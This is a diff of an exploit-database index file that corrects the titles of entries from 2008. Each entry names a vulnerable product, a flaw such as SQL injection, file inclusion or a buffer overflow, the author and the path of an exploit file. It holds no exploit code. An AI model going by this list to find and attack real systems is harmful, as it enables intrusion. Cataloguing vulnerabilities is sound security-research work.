6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0 6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 -6240,platforms/windows/dos/6240.py,"FlashGet 1.9 (FTP PWD Response) Remote BOF Exploit PoC 0day",2008-08-13,h07,windows,dos,0 +6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BOF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC",2008-08-14,Symantec,windows,dos,0 6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0 6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit",2008-08-15,SkOd,windows,remote,21 @@ -5869,7 +5869,7 @@ id,file,description,date,author,platform,type,port 6271,platforms/php/webapps/6271.txt,"Ad Board (id) Remote SQL Injection Vulnerability",2008-08-19,"Hussin X",php,webapps,0 6273,platforms/php/webapps/6273.txt,"SunShop <= 4.1.4 (id) Remote SQL Injection Vulnerability",2008-08-19,"GulfTech Security",php,webapps,0 6276,platforms/php/webapps/6276.txt,"Banner Management Script (tr.php id) Remote SQL Injection Vulnerability",2008-08-19,S.W.A.T.,php,webapps,0 -6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability",2008-08-19,"Hussin X",php,webapps,0 +6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 - Remote SQL Injection Vulnerability",2008-08-19,"Hussin X",php,webapps,0 6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object <= 3.2.30 ActiveX Buffer Overflow Exploit",2008-08-20,"Core Security",windows,remote,0 6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - XSS / Remote Blind SQL Injection Exploit",2008-08-20,Mr.SQL,php,webapps,0 6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 (adid) Remote SQL Injection Vulnerability",2008-08-20,e.wiZz!,php,webapps,0 @@ -5877,11 +5877,11 @@ id,file,description,date,author,platform,type,port 6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability",2008-08-21,~!Dok_tOR!~,php,webapps,0 6285,platforms/php/webapps/6285.txt,"PhotoCart <= 3.9 - Multiple Remote SQL Injection Vulnerabilities",2008-08-21,~!Dok_tOR!~,php,webapps,0 6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities",2008-08-21,SirGod,php,webapps,0 -6287,platforms/php/webapps/6287.txt,"tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability",2008-08-21,cOndemned,php,webapps,0 +6287,platforms/php/webapps/6287.txt,"tinyCMS 1.1.2 - (templater.php) Local File Inclusion Vulnerability",2008-08-21,cOndemned,php,webapps,0 6288,platforms/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6291,platforms/php/webapps/6291.txt,"noname script <= 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 6292,platforms/php/webapps/6292.txt,"onenews beta 2 (xss/hi/sql) Multiple Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 -6293,platforms/multiple/dos/6293.txt,"VLC 0.8.6i MMS Protocol Handling Heap Overflow PoC",2008-08-23,g_,multiple,dos,0 +6293,platforms/multiple/dos/6293.txt,"VLC 0.8.6i Mms Protocol Handling Heap Overflow PoC",2008-08-23,g_,multiple,dos,0 6294,platforms/php/webapps/6294.txt,"5 star review (xss/sql) Multiple Vulnerabilities",2008-08-24,Mr.SQL,php,webapps,0 6295,platforms/php/webapps/6295.txt,"MiaCMS <= 4.6.5 - Multiple Remote SQL Injection Vulnerabilities",2008-08-24,~!Dok_tOR!~,php,webapps,0 6296,platforms/php/webapps/6296.txt,"BtiTracker <= 1.4.7 / xbtit <= 2.0.542 - SQL Injection Vulnerability",2008-08-25,InATeam,php,webapps,0 @@ -5969,7 +5969,7 @@ id,file,description,date,author,platform,type,port 6387,platforms/windows/remote/6387.rb,"CitectSCADA ODBC Server Remote Stack Buffer Overflow Exploit (meta)",2008-09-05,"Kevin Finisterre",windows,remote,2022 6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability",2008-09-06,ZoRLu,php,webapps,0 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow Exploit",2008-09-06,"fl0 fl0w",windows,local,0 -6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x (Insecure Directory) Download Database Vulnerability",2008-09-06,TheJT,php,webapps,0 +6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x - (Insecure Directory) Download Database Vulnerability",2008-09-06,TheJT,php,webapps,0 6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit",2008-09-06,LiquidWorm,windows,dos,0 6392,platforms/php/webapps/6392.php,"Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32)",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal <= 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 @@ -6003,7 +6003,7 @@ id,file,description,date,author,platform,type,port 6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities",2008-09-11,IRCRASH,php,webapps,0 6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline (pageid) SQL Injection Vulnerability",2008-09-11,r45c4l,php,webapps,0 6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability",2008-09-11,StAkeR,php,webapps,0 -6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit",2008-09-11,IRCRASH,php,webapps,0 +6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - XSS/FD/Bypass/SQL Injection Exploit",2008-09-11,IRCRASH,php,webapps,0 6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 (topic) Local File Inclusion Vulnerability",2008-09-11,SirGod,php,webapps,0 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 Bypass SQL Injection Filtering Exploit",2008-09-11,IRCRASH,php,webapps,0 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution Exploit",2008-09-11,IRCRASH,php,webapps,0 @@ -6058,11 +6058,11 @@ id,file,description,date,author,platform,type,port 6483,platforms/php/webapps/6483.txt,"E-Php CMS (article.php es_id) Remote SQL Injection Vulnerability",2008-09-18,HaCkeR_EgY,php,webapps,0 6485,platforms/php/webapps/6485.txt,"addalink <= 4 (category_id) Remote SQL Injection Vulnerability",2008-09-18,ka0x,php,webapps,0 6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 (random) Remote SQL Injection Vulnerability",2008-09-18,SuNHouSe2,php,webapps,0 -6487,platforms/php/webapps/6487.txt,"CYASK 3.x (collect.php neturl) Local File Disclosure Vulnerability",2008-09-18,xy7,php,webapps,0 +6487,platforms/php/webapps/6487.txt,"CYASK 3.x - (collect.php neturl) Local File Disclosure Vulnerability",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability",2008-09-18,SarBoT511,php,webapps,0 6489,platforms/php/webapps/6489.txt,"ProActive CMS (template) Local File Inclusion Vulnerability",2008-09-18,r45c4l,php,webapps,0 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 -6491,platforms/windows/remote/6491.html,"NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 +6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK Activex (NMSDVDX.dll) Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 un64() - Remote Denial of Service Exploit",2008-09-19,"Jeremy Brown",linux,dos,0 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability",2008-09-19,"Egypt Coder",php,webapps,0 @@ -6168,7 +6168,7 @@ id,file,description,date,author,platform,type,port 6595,platforms/php/webapps/6595.txt,"Joovili <= 3.0 - Multiple SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro <= 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 6598,platforms/php/webapps/6598.txt,"CoAST 0.95 (sections_file) Remote File Inclusion Vulnerability",2008-09-27,DaRkLiFe,php,webapps,0 -6599,platforms/php/webapps/6599.txt,"Real Estate Manager (cat_id) Remote SQL injection vulnerability",2008-09-27,CraCkEr,php,webapps,0 +6599,platforms/php/webapps/6599.txt,"Real Estate Manager (cat_id) Remote SQL Injection Vulnerability",2008-09-27,CraCkEr,php,webapps,0 6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 File Execution / IE DoS Exploit",2008-09-27,e.wiZz!,windows,remote,0 6601,platforms/php/webapps/6601.txt,"LnBlog <= 0.9.0 (plugin) Local File Inclusion Vulnerability",2008-09-27,dun,php,webapps,0 6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 (index.php navi) Local File Inclusion Vulnerability",2008-09-27,dun,php,webapps,0 @@ -6188,7 +6188,7 @@ id,file,description,date,author,platform,type,port 6616,platforms/windows/dos/6616.txt,"Microsoft Windows - Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal vuln",2008-09-28,Cr@zy_King,php,webapps,0 -6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 +6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability",2008-09-28,Stack,php,webapps,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 @@ -6196,7 +6196,7 @@ id,file,description,date,author,platform,type,port 6624,platforms/php/webapps/6624.txt,"Arcadem Pro (articlecat) Remote SQL Injection Vulnerability",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 Insecure Cookie Handling Vulnerability",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script Multiple SQL Injection Vulnerabilities",2008-09-29,"Super Cristal",php,webapps,0 -6628,platforms/php/webapps/6628.txt,"ArabCMS (rss.php rss) Local File Inclusion Vulnerability",2008-09-29,JIKO,php,webapps,0 +6628,platforms/php/webapps/6628.txt,"ArabCMS - (rss.php rss) Local File Inclusion Vulnerability",2008-09-29,JIKO,php,webapps,0 6629,platforms/php/webapps/6629.txt,"FAQ Management Script (catid) Remote SQL Injection Vulnerability",2008-09-30,"Hussin X",php,webapps,0 6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module Remote Exploit",2008-09-30,Nine:Situations:Group,windows,remote,0 6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection/Local File Inclusion Vulns",2008-09-30,SirGod,php,webapps,0 @@ -6222,7 +6222,7 @@ id,file,description,date,author,platform,type,port 6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 CWD command Remote Buffer Overflow PoC",2008-10-02,"Julien Bedard",windows,dos,0 6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script Insecure Cookie Handling Vulnerability",2008-10-02,SirGod,php,webapps,0 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability",2008-10-02,ZeN,php,webapps,0 -6654,platforms/windows/dos/6654.pl,"mIRC 6.34 Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0 +6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0 6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0 6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 @@ -6233,7 +6233,7 @@ id,file,description,date,author,platform,type,port 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite <= 1.3 - Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum <= 2.0.2 Arbitary File Upload Vulnerability",2008-10-03,"CWH Underground",php,webapps,0 -6666,platforms/windows/remote/6666.pl,"mIRC 6.34 Remote Buffer Overflow Exploit",2008-10-04,SkD,windows,remote,0 +6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow Exploit",2008-10-04,SkD,windows,remote,0 6667,platforms/php/webapps/6667.txt,"pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability",2008-10-04,JosS,php,webapps,0 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0 6669,platforms/php/webapps/6669.txt,"JMweb Multiple (src) Local File Inclusion Vulnerabilities",2008-10-04,SirGod,php,webapps,0 @@ -6243,7 +6243,7 @@ id,file,description,date,author,platform,type,port 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection Exploit",2008-10-05,J0hn.X3r,php,webapps,0 -6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 +6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 (leggi.php id) Remote SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"fastpublish cms 1.9999 (lfi/sql) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 6679,platforms/php/webapps/6679.txt,"phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability",2008-10-05,JosS,php,webapps,0 @@ -6252,8 +6252,8 @@ id,file,description,date,author,platform,type,port 6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability",2008-10-05,boom3rang,php,webapps,0 6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln",2008-10-05,boom3rang,php,webapps,0 -6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities",2008-10-06,NoGe,php,webapps,0 -6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal vulnerability",2008-10-06,"Brad Antoniewicz",windows,remote,0 +6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion Vulnerabilities",2008-10-06,NoGe,php,webapps,0 +6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal Vulnerability",2008-10-06,"Brad Antoniewicz",windows,remote,0 6687,platforms/php/webapps/6687.pl,"Yerba SACphp <= 6.3 (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 (font color) Remote Crash Vulnerability",2008-10-06,"Jeremy Brown",linux,dos,0 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability",2008-10-07,irk4z,windows,remote,0 @@ -6273,9 +6273,9 @@ id,file,description,date,author,platform,type,port 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0 6706,platforms/php/webapps/6706.php,"Kusaba <= 1.0.4 - Remote Code Execution Exploit",2008-10-09,Sausage,php,webapps,0 -6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 +6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 - Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability",2008-10-09,beford,php,webapps,0 -6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 Remote SQL injection Vulnerability",2008-10-09,rsauron,php,webapps,0 +6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 - Remote SQL Injection Vulnerability",2008-10-09,rsauron,php,webapps,0 6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 (sql/xss) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center (news.php id) SQL Injection Vulnerability",2008-10-09,"Hussin X",php,webapps,0 @@ -6324,7 +6324,7 @@ id,file,description,date,author,platform,type,port 6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player XSPF Memory Corruption Vulnerability",2008-10-14,"Core Security",windows,dos,0 6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - AFD.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection Vulnerability",2008-10-15,TurkishWarriorr,php,webapps,0 -6759,platforms/php/webapps/6759.txt,"mystats (hits.php) Multiple Vulnerabilities exploit",2008-10-15,JosS,php,webapps,0 +6759,platforms/php/webapps/6759.txt,"mystats (hits.php) Multiple Vulnerabilities Exploit",2008-10-15,JosS,php,webapps,0 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability",2008-10-15,JosS,php,webapps,0 6761,platforms/windows/dos/6761.html,"Hummingbird <= 13.0 ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 6762,platforms/php/webapps/6762.txt,"CafeEngine Multiple Remote SQL Injection Vulnerabilities",2008-10-16,0xFFFFFF,php,webapps,0 @@ -6373,20 +6373,20 @@ id,file,description,date,author,platform,type,port 6806,platforms/php/webapps/6806.txt,"phpcrs <= 2.06 (importFunction) Local File Inclusion Vulnerability",2008-10-22,Pepelux,php,webapps,0 6808,platforms/php/webapps/6808.pl,"LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 File Disclosure Vulnerability",2008-10-22,Vrs-hCk,php,webapps,0 -6810,platforms/asp/webapps/6810.txt,"DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability",2008-10-22,syst3m_f4ult,asp,webapps,0 +6810,platforms/asp/webapps/6810.txt,"DorsaCMS (ShowPage.aspx) Remote SQL Injection Vulnerability",2008-10-22,syst3m_f4ult,asp,webapps,0 6811,platforms/php/webapps/6811.txt,"YDC (kdlist.php cat) Remote SQL Injection Vulnerability",2008-10-22,"Hussin X",php,webapps,0 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 sftp realpath Remote Buffer Overflow PoC (auth)",2008-10-22,"Jeremy Brown",windows,dos,0 -6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 Stored Cross Site Scripting Code Exec PoC",2008-10-23,"Aviv Raff",windows,remote,0 +6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Stored Cross Site Scripting Code Execution PoC",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 (opendir) Denial of Service Exploit",2008-10-23,"Jeremy Brown",windows,dos,0 6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (language) Local File Inclusion Vulnerability (win only)",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla Component RWCards 3.0.11 Local File Inclusion Vulnerability",2008-10-23,Vrs-hCk,php,webapps,0 -6818,platforms/php/webapps/6818.txt,"aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies",2008-10-23,JosS,php,webapps,0 +6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilies",2008-10-23,JosS,php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 (index.php id) SQL Injection Vulnerability",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0 6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 -6823,platforms/php/webapps/6823.txt,"siteengine 5.x Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 +6823,platforms/php/webapps/6823.txt,"siteengine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0 6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal vuln",2008-10-24,H!tm@N,php,webapps,0 @@ -6459,9 +6459,9 @@ id,file,description,date,author,platform,type,port 6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory (directory.php id) SQL Injection Vulnerability",2008-10-31,Hurley,php,webapps,0 6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory (directory.php id) SQL Injection Vulnerability",2008-10-31,Hurley,php,webapps,0 6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability",2008-10-31,ZoRLu,php,webapps,0 -6897,platforms/php/webapps/6897.txt,"cpanel 11.x XSS / Local File Inclusion Vulnerability",2008-10-31,IRCRASH,php,webapps,0 +6897,platforms/php/webapps/6897.txt,"cpanel 11.x - XSS / Local File Inclusion Vulnerability",2008-10-31,IRCRASH,php,webapps,0 6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 (edit.php) Arbitrary File Write Vulnerability",2008-10-31,"Shennan Wang",php,webapps,0 -6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 CSRF+XSS Vulnerability",2008-10-31,"Henri Lindberg",hardware,remote,0 +6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 - CSRF+XSS Vulnerability",2008-10-31,"Henri Lindberg",hardware,remote,0 6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0 6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0 @@ -6478,7 +6478,7 @@ id,file,description,date,author,platform,type,port 6913,platforms/php/webapps/6913.txt,"SFS EZ Webring (cat) Remote SQL Injection Vulnerability",2008-10-31,d3b4g,php,webapps,0 6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not (phid) Remote SQL Injection Vulnerability",2008-10-31,d3b4g,php,webapps,0 6915,platforms/php/webapps/6915.txt,"SFS EZ Software (id) Remote SQL Injection Vulnerability",2008-10-31,x0r,php,webapps,0 -6916,platforms/php/webapps/6916.txt,"ModernBill <= 4.4.x XSS / Remote File Inclusion Vulnerability",2008-10-31,nigh7f411,php,webapps,0 +6916,platforms/php/webapps/6916.txt,"ModernBill <= 4.4.x - XSS / Remote File Inclusion Vulnerability",2008-10-31,nigh7f411,php,webapps,0 6917,platforms/php/webapps/6917.php,"Article Publisher PRO (userid) Remote SQL Injection Exploit",2008-10-31,Stack,php,webapps,0 6918,platforms/php/webapps/6918.txt,"SFS EZ Auction (viewfaqs.php cat) Blind SQL Injection Vulnerability",2008-10-31,Stack,php,webapps,0 6919,platforms/php/webapps/6919.txt,"SFS EZ Career (content.php topic) SQL Injection Vulnerability",2008-10-31,Stack,php,webapps,0 @@ -6486,10 +6486,10 @@ id,file,description,date,author,platform,type,port 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 writeFile() API Exploit (meta)",2008-11-01,"Kevin Finisterre",windows,remote,0 6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore (where) Remote SQL Injection Vulnerability",2008-11-01,ZoRLu,php,webapps,0 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site (directory.php cat) SQL Injection Vulnerability",2008-11-01,Hakxer,php,webapps,0 -6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability",2008-11-01,ZoRLu,php,webapps,0 +6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats (id) Remote SQL Injection Vulnerability",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server Response Remote Crash PoC",2008-11-01,DeltahackingTEAM,windows,dos,0 -6927,platforms/php/webapps/6927.txt,"AJ ARTICLE (featured_article.php mode) SQL injection Vulnerability",2008-11-01,Mr.SQL,php,webapps,0 +6927,platforms/php/webapps/6927.txt,"AJ ARTICLE (featured_article.php mode) SQL Injection Vulnerability",2008-11-01,Mr.SQL,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla Component Flash Tree Gallery 1.0 RFI Vulnerability",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 (forum.asp iFor) SQL Injection Vulnerability",2008-11-01,Bl@ckbe@rD,php,webapps,0 @@ -6541,8 +6541,8 @@ id,file,description,date,author,platform,type,port 6978,platforms/php/webapps/6978.txt,"Vibro-CMS Multiple Remote SQL Injection Vulnerabilities",2008-11-04,StAkeR,php,webapps,0 6979,platforms/php/webapps/6979.txt,"nicLOR Puglia Landscape (id) Local File Inclusion Vulnerability",2008-11-04,StAkeR,php,webapps,0 